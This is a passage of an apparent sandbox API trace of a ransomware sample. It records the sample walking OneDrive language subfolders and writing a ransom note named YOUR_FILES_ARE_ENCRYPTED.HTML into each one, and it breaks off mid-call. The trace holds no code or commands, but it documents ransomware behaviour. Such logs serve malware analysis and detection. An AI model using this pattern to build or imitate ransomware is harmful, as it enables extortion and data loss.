FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1102b950, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1102b950, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1149d5d9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.660] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.660] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.660] GetProcessHeap () returned 0x600000 [0112.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.661] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.662] CloseHandle (hObject=0x328) returned 1 [0112.662] GetProcessHeap () returned 0x600000 [0112.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.662] GetProcessHeap () returned 0x600000 [0112.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.662] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x116ff8a5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x116ff8a5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x116ff8a5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="prs-af", cAlternateFileName="")) returned 1 [0112.663] StrStrIW (lpFirst="prs-af", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.663] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af") returned 82 [0112.663] GetProcessHeap () returned 0x600000 [0112.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.664] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af" [0112.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\*" [0112.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x116ff8a5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x116ff8a5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11e72c7e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0112.664] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x116ff8a5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x116ff8a5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11e72c7e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.665] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e72c7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x11e72c7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x12ba82ea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.665] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.665] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\FileSync.LocalizedResources.dll.mui") returned 118 [0112.665] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.665] lstrlenW (lpString=".mui") returned 4 [0112.665] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.665] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e72c7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x11e72c7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x12ba82ea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.665] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0112.665] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0112.665] GetProcessHeap () returned 0x600000 [0112.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\prs-af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.665] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.667] CloseHandle (hObject=0x328) returned 1 [0112.667] GetProcessHeap () returned 0x600000 [0112.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.667] GetProcessHeap () returned 0x600000 [0112.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.667] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x130c8fc0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x130c8fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x130c8fc0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-br", cAlternateFileName="")) returned 1 [0112.667] StrStrIW (lpFirst="pt-br", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.668] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br") returned 81 [0112.668] GetProcessHeap () returned 0x600000 [0112.668] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.669] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br" [0112.669] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\*" [0112.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x130c8fc0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x130c8fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x133517d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.669] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x130c8fc0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x130c8fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x133517d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.670] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x133517d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x133517d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x135ad91f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.670] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.670] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.670] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.670] lstrlenW (lpString=".mui") returned 4 [0112.670] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.670] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x133517d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x133517d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x135ad91f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.670] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.670] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.670] GetProcessHeap () returned 0x600000 [0112.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.670] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.672] CloseHandle (hObject=0x328) returned 1 [0112.672] GetProcessHeap () returned 0x600000 [0112.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.672] GetProcessHeap () returned 0x600000 [0112.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.672] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13646246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13646246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13646246, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0112.673] StrStrIW (lpFirst="pt-pt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.673] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt") returned 81 [0112.673] GetProcessHeap () returned 0x600000 [0112.673] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.674] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt" [0112.674] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\*" [0112.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13646246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13646246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13967473, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.674] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13646246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13646246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13967473, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.675] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13967473, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13967473, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13e071a6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.675] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.675] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.675] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.675] lstrlenW (lpString=".mui") returned 4 [0112.675] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.675] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13967473, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13967473, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13e071a6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.675] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.675] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.675] GetProcessHeap () returned 0x600000 [0112.675] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.675] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.677] CloseHandle (hObject=0x328) returned 1 [0112.691] GetProcessHeap () returned 0x600000 [0112.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.691] GetProcessHeap () returned 0x600000 [0112.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.692] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e9e78d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13e9e78d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13e9e78d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="qut-latn", cAlternateFileName="")) returned 1 [0112.692] StrStrIW (lpFirst="qut-latn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.692] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn") returned 84 [0112.692] GetProcessHeap () returned 0x600000 [0112.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.693] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn" [0112.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\*" [0112.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e9e78d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13e9e78d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x141bf6d6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.694] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e9e78d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13e9e78d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x141bf6d6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.694] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141bf6d6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x141bf6d6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1489a4b4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.694] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.694] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\FileSync.LocalizedResources.dll.mui") returned 120 [0112.694] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.694] lstrlenW (lpString=".mui") returned 4 [0112.694] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.695] FindNextFileW (in: 